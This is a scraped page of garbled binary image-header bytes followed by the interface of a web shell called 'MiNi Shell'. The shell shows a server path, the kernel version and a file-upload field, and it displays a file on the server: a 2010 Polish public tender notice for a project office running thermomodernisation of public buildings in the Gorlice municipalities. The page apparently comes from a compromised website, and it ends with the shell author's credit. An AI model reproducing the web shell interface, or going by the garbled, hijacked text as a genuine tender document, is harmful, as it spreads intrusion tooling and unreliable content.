JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100824/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100824/228923-N-2010.html

<p class="kh_header"><b>Gorlice: Pełnienie funkcji BIURA OBSŁUGI PROJEKTU dla przedsięwzięcia: Termomodernizacja obiektów użyteczności publicznej na terenie gmin Ziemi Gorlickiej Współfinansowanego w ranach działania 9.3. POIiŚ.</b><br>
<b>Numer ogłoszenia: 228923 - 2010; data zamieszczenia: 24.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Związek Gmin Ziemi Gorlickiej , ul. Jagiełły 10, 38-300 Gorlice, woj. małopolskie, tel. 18 352 43 06, faks 18 352 43 06.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji BIURA OBSŁUGI PROJEKTU dla przedsięwzięcia: Termomodernizacja obiektów użyteczności publicznej na terenie gmin Ziemi Gorlickiej Współfinansowanego w ranach działania 9.3. POIiŚ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie przez Wykonawcę na rzecz Zamawiającego usług obsługi administracyjno-biurowej, finansowo-księgowej i sprawozdawczej dla całości przedsięwzięć inwestycyjnych w ramach Programu: Termomodernizacja obiektów użyteczności publicznej na terenie gmin Ziemi Gorlickiej Zamówienie finansowane ze środków publicznych w ramach: Priorytetu IX Programu Operacyjnego Infrastruktura i Środowisko  Działanie 9.3 Termomodernizacja użyteczności publicznej  obejmującym zadania w poszczególnych gminach: Biecz, Bobowa, Lipinki, Moszczenica, Sękowa, Ropa i Miasta Gorlice w ramach projektu Termomodernizacja obiektów użyteczności publicznej na terenie gmin Ziemi Gorlickiej. Szacunkowa wartość robót budowlanych objętych niniejszym projektem zgodnie z zapisami wniosku o dofinansowanie wynosi ok. 19,8 mln zł netto. Szczegółowy wykaz budynków zawarty został w SIWZ.
2.Przedmiot zamówienia obejmuje wykonanie następujących czynności związanych z realizacją Przedsięwzięcia - zgodnie z przepisami Ustawy Prawo zamówień publicznych (p.z.p.), przepisów o finansach publicznych, Kodeksu postępowania administracyjnego i Prawa budowlanego oraz z godnie z przepisami i zasadami obowiązującymi dla Projektu:
a) obsługa biurowa Projektu, w tym:
- prowadzenie sekretariatu Projektu;
- kompletowanie, archiwizowanie, tłumaczenie na język angielski lub polski dokumentacji  projektowej i przetargowej oraz korespondencji w sprawie Projektu;
-uzyskanie i zarejestrowanie w Wydziale Architektury i Budownictwa Starostwa Powiatowego w Gorlicach i przekazanie Inspektorowi Nadzoru budowy dzienników budowy wraz z wypełnioną częścią tytułową;
-dokonywanie zgłoszenia o rozpoczęciu robót budowlanych do odpowiedniego organu nadzoru budowlanego,
-obsługa administracyjna i biurowa oraz prowadzenie protokołów narad roboczych i koordynacyjnych z realizacji Projektu;
-prowadzenie korespondencji w sprawie Projektu ( dziennik podawczy, Księgi Spraw);
 -uzyskiwanie wymaganych właściwymi przepisami opinii, uzgodnień i decyzji związanych z realizacja Projektu,
-sprawozdawczość z realizacji Projektu.
-przygotowanie i złożenie wniosku o wydanie decyzji pozwolenia na użytkowanie obiektu (jeżeli wynika to z decyzji pozwolenia na budowę) lub przygotowanie i złożenie wniosku o zakończenie budowy.
b) Obsługa administracyjna i biurowa postępowań o udzielenie zamówień publicznych związanych z realizacją Projektu oraz obsługa realizacji i odbioru Projektu, w tym:
-czynności ogłaszania w odpowiednich Biuletynach, na stronie internetowej i w siedzibie Zamawiającego postępowań przetargowych w sprawie realizacji Projektu;
-przygotowanie uzupełnień formatu elektronicznego dokumentacji projektowej   i przetargowej,
-udostępnianie wersji elektronicznej dokumentacji projektowej i przetargowej,
-przygotowanie informacji do udzielenia ewentualnych wyjaśnień wykonawcom na etapie poprzedzającym składanie ofert,
-przyjęcie od wykonawców  ofert w sprawie postępowań o udzielenie zamówień publicznych związanych z realizacją Projektu i przekazanie ich Przewodniczącemu komisji przetargowej kompletowanie,
-udział w pracach Komisji Przetargowej w charakterze członka lub doradcy Komisji Przetargowej poprzez:
-udział w posiedzeniu Komisji Przetargowej podczas otwarcia ofert.
-udział w pracach Komisji Przetargowej wyłaniającej wykonawcę robót.
-prowadzenie i archiwizacja Protokołu i, ofert oraz dokumentacji przetargowej z postępowań o udzielenie zamówień publicznych związanych z realizacją Projektu, publikowanie wyników postępowań o udzielenie zamówienia oraz o zawarciu umów,
- umowy zawartej z wykonawcą robót budowlanych 
-w przypadku odwołań czynny udział w wyjaśnianiu spraw proceduralnych łącznie z reprezentowaniem Zamawiającego w arbitrażu przed Krajową Izbą Odwoławczą przy Prezesie Urzędu Zamówień Publicznych,
-zapoznanie się z warunkami finansowania przedmiotu umowy, a zwłaszcza z ustalonymi zasadami płatności za częściowe i całkowite wykonanie robót,
-przejęcie od wykonawcy robót harmonogramu rzeczowo - finansowego realizacji robót budowlanych oraz przekazanie kopi takiego harmonogramu Zamawiającemu,
-przejęcie kopii opłaconych polis ubezpieczeniowych ubezpieczenia budowy dokonanych przez wykonawcę w firmie ubezpieczeniowej na warunkach postawionych przez Zamawiającego,
-przejęcie od wykonawcy szczegółowych wykazów obejmujących kierownictwo robót i poszczególne kategorie robotników zatrudnionych przez wykonawcę na budowie,
-przyjęcie od wykonawcy projektów umów z podwykonawcami i przedstawienie wniosków w sprawie ich akceptacji Zamawiającemu,
c) obsługa finansowa Projektu, w tym:
-przyjmowanie, sprawdzanie pod względem rachunkowym i merytorycznym, opisywanie, księgowanie dokumentów finansowych ,
-gromadzenie i przechowywanie materiałów analitycznych niezbędnych do rozliczenia wykonanych robót i oceny osiągniętych efektów rzeczowych lub gospodarczych,
-prowadzenie raportów, ksiąg finansowych i kasowych oraz rozliczeń księgowych operacji finansowych ,
-planowanie i zabezpieczanie środków finansowych na realizację Projektu zgodnie z zawartymi umowami,
-sprawozdawczość finansowo-księgowa,
 -przygotowanie dla Zamawiającego jako Jednostki Realizującej Projekt (JRP)      wniosków o płatność, udział w kwalifikacji kosztów zgodnie z obowiązującymi w tym
zakresie wytycznymi, raportowanie, bieżąca sprawozdawczość.
W tym zakresie w szczególności należy do obowiązków-czynności:
-przygotowywania zgodnie z Wytycznymi w zakresie sprawozdawczości POIŚ wydanymi przez MRR i innymi wymogami POIiŚ projektów dokumentów sprawozdawczych (pisemnie i na nośniku elektronicznym), oraz przedkładanie ich Zamawiającemu, a w szczególności:  
-sprawozdania kwartalne na formularzu dostarczonym przez Zamawiającego zgodnie z zestawieniem zrealizowanych wydatków w ramach Projektu wraz z wymaganymi załącznikami w terminie do ostatniego dnia miesiąca dany kwartał,
-harmonogramów płatności na kolejne okresy sprawozdawcze razem ze sprawozdaniem kwartalnym, o którym mowa w ppkt a),
-wszystkich innych dokumentów i informacji związanych z realizacją Projektu, których Zamawiający zażąda w wyznaczonym przez niego terminie,
-sporządzenie zestawienia końcowego wykonanych prac i zestawienie faktur wystawionych w trakcie realizacji umowy.
-udział w przygotowaniu projektów raportów z osiągniętych efektów rzeczowych i ekologicznych i udzielania wszelkich innych wyjaśnień Zamawiającemu w zakresie realizacji zadań inwestycyjnych w ciągu 5 lat po zakończeniu realizacji projektu.
-gromadzić na bieżąco dokumentację z wykonanych robót i z dokonanych rozliczeń,
-prowadzić na bieżąco rejestr spraw budowy i rozliczania środków, a w szczególności :
-przejmowanie od wykonawcy, na koniec każdego miesiąca, wycenionego zestawienia robocizny, materiałów i sprzętu wykonawcy w celu stwierdzenia zgodności wykonywania robót zgodnie z harmonogramem rzeczowo - finansowym, jeśli jest w umowie wymagany,
-potwierdzanie wartości robót wykonanych zgodnie z harmonogramem rzeczowo - finansowym, za które wykonawca powinien otrzymać zapłatę,
-gromadzić wszelkie dokumenty z realizacji zadania, a zwłaszcza faktury, protokoły odbioru częściowego robót, dokumenty pochodzenia materiałów i ich certyfikaty, dokumenty dostaw, montażu i gwarancji urządzeń,
-dostarczać Zamawiającemu oryginały faktur wraz z protokołem odbioru do sprawdzenia i zatwierdzenia,
- dokonywać opisu faktur zgodnie z wymaganiami programu oraz Lidera - koordynatora Projektu,
- sprawdzać i zatwierdzać faktury końcowe stwierdzające wysokość kwoty, która jako ostateczna należna jest wykonawcy zgodnie z umową,
- uczestniczyć we wszystkich procedurach kontrolnych projektu, w trakcie jego trwania i po jego zakończeniu.
- uzyskanie aktualizacji kosztorysów inwestorskich przed ogłoszeniem postępowania.
- opracowanie i przekazanie do Zamawiającego  protokołu przejęcia środka trwałego na druku OT,
3.Wykonawca  wykonując swoje czynności działa w imieniu i na rachunek Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.54.00.00-5, 71.54.10.00-2, 71.24.40.00-0, 75.11.21.00-5, 79.41.20.00-5, 79.50.00.00-9, 79.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 5 000,00 zł. (słownie: pięć tysięcy);</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał  czynności administracyjno-prawne oraz biurowe lub finansowo-księgowe lub obsługi inwestycyjnej (np.  nadzór inwestorski, przygotowanie aplikacji o dofinansowanie zadań inwestycyjnych) związane z obsługą jednostek samorządowych lub gospodarczych o wartości minimum 400 000 zł brutto , w tym co najmniej jeden projekt termomodernizacyjny współfinansowany z dotacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże dysponowanie osobami zdolnymi do wykonania zamówienia tj:
a) Kierownik Biura:
Kwalifikacje zawodowe:
wykształcenie wyższe prawnicze, uprawnienia do wykonywania zawodu adwokata lub radcy prawnego lub do jego zastępowania,
Doświadczenie:
nie mniej niż 3 letnie doświadczenie zawodowe w pełnieniu stanowiska kierowniczego tj. kierowaniu grupą pracowników
nie mniej niż 3 letnie doświadczenie w prowadzeniu obsługi inwestycji budowlanych oraz Projektów finansowanych z udziałem dotacji, praktyczna znajomość Prawa Zamówień Publicznych, Prawa Budowlanego, 
nie mniej niż 3 letnie doświadczenie w wykonywaniu czynności na rzecz administracji samorządowej lub gospodarczej
b). Księgowa:
Kwalifikacje zawodowe:
wykształcenie co najmniej wyższe licencjackie, 
znajomość zagadnień dotyczących projektów finansowanych z udziałem dotacji
c) Księgowa Projektu:	
Kwalifikacje zawodowe:
wykształcenie co najmniej średnie,
uprawnienia samodzielnej księgowej lub doświadczenie co najmniej 3-letnie na samodzielnym stanowisku księgowym lub planowania i rozliczeń
d). Pracownik administracyjnoprawny i do spraw zamówień publicznych:
wykształcenie wyższe prawnicze, 
doświadczenie co najmniej 2-letnie w pracy w wykonywaniu czynności na rzecz administracji samorządowej lub gospodarczej
doświadczenie zawodowe w wykonywaniu czynności z zakresu prawa zamówień publicznych,
doświadczenie zawodowe w zakresie rozliczeń finansowych
znajomość języka angielskiego potwierdzona certyfikatem
e). Pracownik ds. dokumentacji i sprawozdawczości:
wykształcenie wyższe techniczne,
doświadczenie co najmniej roczne w wykonywaniu czynności na rzecz administracji samorządowej lub gospodarczej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości nie mniejszej niż 400.000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy, pełnomocnictwo,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, pod warunkiem przeprowadzenia jej zgodnie z zapisami zawartymi 
 w SIWZ, dotyczące:
1) terminu wykonania zamówienia, w przypadku zmiany terminu realizacji kontraktu/kontraktów na roboty budowlane,
2) sposobu i zakresu wykonania zamówienia w przypadku:
a) ograniczenia zakresu zamówienia wynikającego z braku środków finansowych lub zmiany wielkości dofinansowania ze środków POIiŚ na realizację Projektu, 
b) ograniczenia zakresu prac wynikających z wprowadzenia do dokumentacji projektowej istotnych lub nieistotnych zmian w rozumieniu ustawy Prawo budowlane, 
c) ograniczenia zakresu prac z przyczyn nie leżących po stronie Zamawiającego i Wykonawcy, których nie dało się przewidzieć w dniu podpisania umowy.
d). wystąpienia siły wyższej
3) innych postanowień umowy w przypadku:
a) zmiany stawek podatku od towarów i usług,
b) zmiany podwykonawców lub zmian personalnych w składzie zespołu
Biura Obsługi Projektu.
c) zmiany danych podmiotowych dotyczących Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> Specyfikacja istotnych warunków zamówienia dostępna na stronie internetowej Biuletynu Informacji Pub<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Związek Gmin Ziemi Gorlickiej,  
38-300 Gorlice,  
ul. Jagiełły 10,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.09.2010 godzina 09:00, miejsce: Związek Gmin Ziemi Gorlickiej,  
38-300 Gorlice,  
ul. Jagiełły 10,-sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie finansowane ze środków publicznych w ramach:
Priorytetu IX Programu Operacyjnego Infrastruktura i Środowisko 2007-2013.
Działanie 9.3 Termomodernizacja obiektów użyteczności publicznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com